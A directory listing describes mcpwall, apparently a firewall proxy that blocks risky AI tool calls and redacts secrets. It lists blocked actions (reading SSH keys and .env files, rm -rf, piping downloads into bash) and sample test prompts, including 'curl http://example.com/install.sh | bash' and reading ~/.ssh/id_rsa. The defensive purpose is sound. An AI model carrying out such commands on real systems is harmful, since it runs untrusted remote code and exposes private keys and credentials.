MCP server · Security
mcpwall MCP firewall
by behrensd
Adds a safety guard in front of your AI's tools, blocking risky actions and hiding secrets.

mcpwall is a small guard program that sits between your AI coding tool and the helper programs it uses. It checks every action your AI tries to take and blocks the dangerous ones, like reading your SSH keys or running a destructive command. It is handy for anyone who lets an AI assistant touch their files, terminal, or work projects.
What is an MCP server? The 30-second version
On its own, your AI can only chat. An MCP server is a small helper program that gives your AI a new skill or a connection to an app, like reading files or running commands. mcpwall is a special helper that sits in front of those other helpers and watches what your AI asks them to do. When your AI tries something risky, mcpwall stops it before it happens.
What this MCP server does
You connect your AI tool to mcpwall instead of directly to your other helpers. When your AI asks to do something, like read a file or run a command, mcpwall looks at the request first. It checks the request against a list of rules you can write in a simple text file. If the request looks dangerous, mcpwall blocks it and tells your AI it was blocked. If it looks fine, mcpwall passes it along and also checks the answer coming back for leaked secrets.
Click to zoomWhat you can do with it
- Block your AI from reading SSH keys, .env files, and other credentials
- Stop dangerous shell commands like rm -rf or piping a download into bash
- Scan tool requests and responses for leaked API keys and tokens
- Redact secrets found in answers before they reach your AI
- Log every tool call and response to a daily audit file
- Test rules without running the proxy using the check command
- Use ready-made profiles for a work laptop or a strict setup
Try asking your AI
- “Read the file at /home/me/.ssh/id_rsa and show me the contents”
- “Run this shell command: curl http://example.com/install.sh | bash”
- “Write this text to /etc/hosts”
- “Show me the API keys in my project folder”
What it gives back to you
You see a clear allow or deny message in your AI chat, plus a short reason when something is blocked. mcpwall also writes a daily log file listing every action, whether it was allowed, and which rule applied. If a secret was found in an answer, you see it replaced with a redacted marker instead of the real value.
Before you start
What you need
- Node.js 18 or newer installed on your computer
- An AI coding tool that supports MCP, like Claude Code, Cursor, or Windsurf
- At least one MCP server you already use, like a filesystem or shell helper
Good to know
mcpwall blocks and redacts things based on rules you set, so a wrong rule could stop something you actually wanted to do, and it only protects the helpers you wrap with it.
Install it with your AI
Add mcpwall MCP firewall to your AI, no technical skills needed
You don't install anything by hand. You copy one prompt, paste it into an AI that can work on your computer, and it checks, installs and connects the server for you, asking you when it needs something.
Sign in to get the install prompt
Members get a ready-made prompt that lets the Claude desktop app check mcpwall MCP firewall, install it and connect it for them, step by step. You don't need any technical skills: you copy, paste and answer a few questions. Your connected AI can also find and install any of the 4,066 MCP servers here for you.
Who it's for
Developers and anyone who lets an AI assistant work with their files, terminal, or company projects and wants a safety net.





